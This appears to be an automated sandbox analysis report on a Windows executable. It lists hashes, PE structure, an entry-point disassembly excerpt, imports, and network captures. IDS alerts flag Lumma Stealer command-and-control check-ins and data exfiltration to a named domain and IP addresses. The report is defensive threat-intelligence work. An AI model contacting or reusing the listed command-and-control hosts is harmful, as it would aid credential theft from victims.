File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.372092263487298
Encrypted:	false
SSDEEP:	6144:CFVfpi6ceLP/9skLmb0ayWWSPtaJG8nAge35OlMMhA2AX4WABlguNqiL:KV1QyWWI/glMM6kF7Iq
MD5:	1715B9559591B26611CE7E31484C89CB
SHA1:	321F760BCACC9FE146CBD954F863A398B49FAA2B
SHA-256:	7B04A3C5945FFA595D1EF94A265FE9CE7AE3438460B98AC967087AFEF0A8F0C8
SHA-512:	956B5152EBEE8C97A59523E316F922E1286CC17EA0FFEBD58882ED2754573149F50123AFC64D3C897875A28DC09D26900E13BE4A54185180D2B92D5ED9208ED6
Malicious:	false
Reputation:	low
Preview:	regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmn...^..............................................................................................................................................................................................................................................................................................................................................}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.543603886509456
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	J18zxRjOes.exe
File size:	371'712 bytes
MD5:	75a2daff1ea8532d28cfba008de10a40
SHA1:	7bc7ee781536ce083209c3a88123b2388ac7d200
SHA256:	2ac05e705652a1fc55b355a3822fdcfee4afab2b157af108a6777532e1b2044a
SHA512:	886662384799219ffa58c86ab293c43dcb77ef569d26a7905b81f446d11d12c552d07e3b6463f894b0c8f5166004382e6d42cdf3c252594db14de43bcecbf74b
SSDEEP:	6144:sNLVnM/IdlUwSsK776Ga/T9jCcSgyaj0fnODbpAH0qjSF+QZi:sN5M/IDq7rcT9jCcSgFinOX
TLSH:	EB84125136A0C872C96395302826C7A16D7F79294AB85B8F37E82BAD1F711D35337387
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#.!.g.OCg.OCg.OC...Cf.OCy..CB.OCy..C}.OCy..C..OC@M4C`.OCg.NC..OCy..Cf.OCy..Cf.OCy..Cf.OCRichg.OC........PE..L....Vve...........

File Icon


Icon Hash:	46c7c30b0f4e8d19

Static PE Info

General

Entrypoint:	0x404122
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x657656BC [Mon Dec 11 00:24:28 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	d8ecff67c177ab688915d2b483d1913b

Entrypoint Preview

Instruction
call 00007F4B088A32ACh
jmp 00007F4B088A045Eh
mov edi, edi
push ebp
mov ebp, esp
push edi
mov edi, 000003E8h
push edi
call dword ptr [004010ACh]
push dword ptr [ebp+08h]
call dword ptr [004010A8h]
add edi, 000003E8h
cmp edi, 0000EA60h
jnbe 00007F4B088A05E6h
test eax, eax
je 00007F4B088A05C0h
pop edi
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
call 00007F4B088A0D26h
push dword ptr [ebp+08h]
call 00007F4B088A0B73h
push dword ptr [0044F014h]
call 00007F4B088A16EEh
push 000000FFh
call eax
add esp, 0Ch
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
push 00401260h
call dword ptr [004010A8h]
test eax, eax
je 00007F4B088A05F7h
push 00401250h
push eax
call dword ptr [00401058h]
test eax, eax
je 00007F4B088A05E7h
push dword ptr [ebp+08h]
call eax
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
push dword ptr [ebp+08h]
call 00007F4B088A05ADh
pop ecx
push dword ptr [ebp+08h]
call dword ptr [004010B0h]
int3
push 00000008h
call 00007F4B088A3416h
pop ecx
ret
push 00000008h
call 00007F4B088A3333h
pop ecx
ret
mov edi, edi
push ebp
mov ebp, esp
push esi
mov esi, eax
jmp 00007F4B088A05EDh
mov eax, dword ptr [esi]
test eax, eax
je 00007F4B088A05E4h

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4db4c	0x50	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x5a000	0x70a8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2d78	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x190	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4d470	0x4d600	ce5766242c26496661427c4bfa69efa9	False	0.9056347182956381	data	7.875959849695945	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x4f000	0xaba4	0x6000	20831623dc59fc3d2df40f76970b16ef	False	0.07999674479166667	Matlab v4 mat-file (little endian) \342C@, rows 0, columns 0	0.9412543764926924	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x5a000	0xd0a8	0x7200	d8d13aa20c704f8756ddba5d13671fa3	False	0.7433867872807017	data	6.468077318137671	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x60280	0x330	Device independent bitmap graphic, 48 x 96 x 1, image size 0			0.1948529411764706
RT_CURSOR	0x605b0	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.33223684210526316
RT_ICON	0x5a390	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Romanian	Romania	0.8073027718550106
RT_ICON	0x5b238	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Romanian	Romania	0.8407039711191335
RT_ICON	0x5bae0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Romanian	Romania	0.7690092165898618
RT_ICON	0x5c1a8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Romanian	Romania	0.8735549132947977
RT_ICON	0x5c710	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Romanian	Romania	0.8045643153526971
RT_ICON	0x5ecb8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Romanian	Romania	0.8299718574108818
RT_ICON	0x5fd60	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Romanian	Romania	0.8643617021276596
RT_STRING	0x60928	0x3ce	AmigaOS bitmap font "i", fc_YSize 30720, 19456 elements, 2nd "f", 3rd "v"	Romanian	Romania	0.4650924024640657
RT_STRING	0x60cf8	0x3b0	data	Romanian	Romania	0.461864406779661
RT_ACCELERATOR	0x60230	0x50	data	Romanian	Romania	0.8125
RT_GROUP_CURSOR	0x606e0	0x22	data			1.0294117647058822
RT_GROUP_ICON	0x601c8	0x68	data	Romanian	Romania	0.6826923076923077
RT_VERSION	0x60708	0x220	data			0.5202205882352942

Imports

DLL	Import
KERNEL32.dll	SetLocaleInfoA, WriteConsoleInputW, InterlockedIncrement, EnumCalendarInfoW, InterlockedDecrement, GetCurrentProcess, InterlockedCompareExchange, WriteConsoleInputA, SetComputerNameW, FreeEnvironmentStringsA, GetWindowsDirectoryA, EnumTimeFormatsW, SwitchToFiber, ReadConsoleInputA, GetVersionExW, GetAtomNameW, FindNextVolumeMountPointW, GetShortPathNameA, LCMapStringA, GetLogicalDriveStringsA, GetLastError, SetLastError, GetProcAddress, VirtualAlloc, EnumSystemCodePagesW, LoadLibraryA, OpenEventA, GetCommMask, FindNextFileA, EnumDateFormatsA, GetModuleHandleA, TerminateJobObject, GetCurrentProcessId, EnumCalendarInfoExA, FindNextVolumeA, CreateFileA, WriteConsoleW, GetConsoleOutputCP, WriteConsoleA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, TerminateProcess, IsDebuggerPresent, HeapAlloc, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, HeapSize, HeapFree, SetHandleCount, GetFileType, GetStartupInfoA, DeleteCriticalSection, SetFilePointer, EnterCriticalSection, LeaveCriticalSection, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, HeapReAlloc, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, RtlUnwind, RaiseException, SetStdHandle, GetLocaleInfoA, WideCharToMultiByte, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetConsoleCP, GetConsoleMode, FlushFileBuffers, CloseHandle
USER32.dll	OemToCharA, DdeQueryStringA, GetWindowTextLengthA
SHELL32.dll	DragQueryPoint

Possible Origin

Language of compilation system	Country where language is spoken	Map
Romanian	Romania

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-04T15:33:20.958821+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49708	104.21.56.70	443	TCP
2025-01-04T15:33:21.822713+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49709	176.113.115.19	80	TCP
2025-01-04T15:33:29.349927+0100	2058606	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cloudewahsj .shop)	1	192.168.2.8	65229	1.1.1.1	53	UDP
2025-01-04T15:33:29.851063+0100	2058607	ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI)	1	192.168.2.8	49710	104.21.48.1	443	TCP
2025-01-04T15:33:29.851063+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49710	104.21.48.1	443	TCP
2025-01-04T15:33:30.308802+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.8	49710	104.21.48.1	443	TCP
2025-01-04T15:33:30.308802+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.8	49710	104.21.48.1	443	TCP
2025-01-04T15:33:30.783155+0100	2058607	ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI)	1	192.168.2.8	49711	104.21.48.1	443	TCP
2025-01-04T15:33:30.783155+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49711	104.21.48.1	443	TCP
2025-01-04T15:33:31.294966+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.8	49711	104.21.48.1	443	TCP
2025-01-04T15:33:31.294966+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.8	49711	104.21.48.1	443	TCP
2025-01-04T15:33:32.141058+0100	2058607	ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI)	1	192.168.2.8	49712	104.21.48.1	443	TCP
2025-01-04T15:33:32.141058+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49712	104.21.48.1	443	TCP
2025-01-04T15:33:32.694819+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.8	49712	104.21.48.1	443	TCP
2025-01-04T15:33:33.307851+0100	2058607	ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI)	1	192.168.2.8	49714	104.21.48.1	443	TCP
2025-01-04T15:33:33.307851+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49714	104.21.48.1	443	TCP
2025-01-04T15:33:35.148125+0100	2058607	ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI)	1	192.168.2.8	49717	104.21.48.1	443	TCP
2025-01-04T15:33:35.148125+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49717	104.21.48.1	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 4, 2025 15:33:19.935817003 CET	49708	443	192.168.2.8	104.21.56.70
Jan 4, 2025 15:33:19.935847044 CET	443	49708	104.21.56.70	192.168.2.8
Jan 4, 2025 15:33:19.935921907 CET	49708	443	192.168.2.8	104.21.56.70
Jan 4, 2025 15:33:19.952364922 CET	49708	443	192.168.2.8	104.21.56.70
Jan 4, 2025 15:33:19.952380896 CET	443	49708	104.21.56.70	192.168.2.8
Jan 4, 2025 15:33:20.504966021 CET	443	49708	104.21.56.70	192.168.2.8
Jan 4, 2025 15:33:20.505109072 CET	49708	443	192.168.2.8	104.21.56.70
Jan 4, 2025 15:33:20.601299047 CET	49708	443	192.168.2.8	104.21.56.70
Jan 4, 2025 15:33:20.601314068 CET	443	49708	104.21.56.70	192.168.2.8
Jan 4, 2025 15:33:20.601725101 CET	443	49708	104.21.56.70	192.168.2.8
Jan 4, 2025 15:33:20.601783991 CET	49708	443	192.168.2.8	104.21.56.70
Jan 4, 2025 15:33:20.606421947 CET	49708	443	192.168.2.8	104.21.56.70
Jan 4, 2025 15:33:20.647334099 CET	443	49708	104.21.56.70	192.168.2.8
Jan 4, 2025 15:33:20.958844900 CET	443	49708	104.21.56.70	192.168.2.8
Jan 4, 2025 15:33:20.958918095 CET	49708	443	192.168.2.8	104.21.56.70
Jan 4, 2025 15:33:20.958929062 CET	443	49708	104.21.56.70	192.168.2.8
Jan 4, 2025 15:33:20.959733009 CET	49708	443	192.168.2.8	104.21.56.70
Jan 4, 2025 15:33:20.960525990 CET	49708	443	192.168.2.8	104.21.56.70
Jan 4, 2025 15:33:20.960545063 CET	443	49708	104.21.56.70	192.168.2.8
Jan 4, 2025 15:33:20.960552931 CET	49708	443	192.168.2.8	104.21.56.70
Jan 4, 2025 15:33:20.960982084 CET	49708	443	192.168.2.8	104.21.56.70
Jan 4, 2025 15:33:21.079863071 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:21.084642887 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:21.088495970 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:21.088593960 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:21.093298912 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:21.822628975 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:21.822660923 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:21.822712898 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:21.822746992 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:21.822752953 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:21.822767019 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:21.822777987 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:21.822791100 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:21.822814941 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:21.822818995 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:21.822829008 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:21.822848082 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:21.822854042 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:21.822899103 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:21.969377041 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:21.969398975 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:21.969521046 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:21.969557047 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:21.969569921 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:21.969582081 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:21.969595909 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:21.969599009 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:21.969629049 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:21.969654083 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:21.970299006 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:21.970340967 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:21.970354080 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:21.970366955 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:21.970383883 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:21.970415115 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:21.971210957 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:21.971223116 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:21.971234083 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:21.971246004 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:21.971297026 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:21.972037077 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:21.972090006 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.056247950 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.056459904 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.113878012 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.113919973 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.114010096 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.114029884 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.114039898 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.114088058 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.114146948 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.114160061 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.114172935 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.114197969 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.114231110 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.114625931 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.114639044 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.114650011 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.114660978 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.114672899 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.114681959 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.114707947 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.114742994 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.115322113 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.115345955 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.115375996 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.115389109 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.185880899 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.185987949 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.259275913 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.259294987 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.259373903 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.259387970 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.259397984 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.259452105 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.259526014 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.259546995 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.259561062 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.259572983 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.259601116 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.259939909 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.259953022 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.259965897 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.259975910 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.259991884 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.260004997 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.260026932 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.260416985 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.260438919 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.260451078 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.260459900 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.260472059 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.260479927 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.260488033 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.260494947 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.260502100 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.260510921 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.260524988 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.260545015 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.261348009 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.261387110 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.405884027 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.405900002 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.405982971 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.405992031 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.406013012 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.406025887 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.406037092 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.406043053 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.406053066 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.406073093 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.406100988 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.406563044 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.406565905 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.406610966 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.406795025 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.406819105 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.406835079 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.406857967 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.593004942 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.593018055 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.593051910 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.593075991 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.693625927 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.693639994 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.693675995 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.693694115 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.693793058 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.693814993 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.693828106 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.693833113 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.693850994 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.693865061 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.693937063 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.693981886 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.693988085 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.693994999 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.694015980 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.694030046 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.694309950 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.694323063 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.694334984 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.694351912 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.694353104 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.694360018 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.694367886 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.694406986 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.694890976 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.694904089 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.694916964 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.694930077 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.694932938 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.694943905 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.694956064 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.694961071 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.694974899 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.694987059 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.695005894 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.695027113 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:22.695698023 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.695710897 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:22.695724964 CET	80	49709	176.113.115.19	192.168.2.8
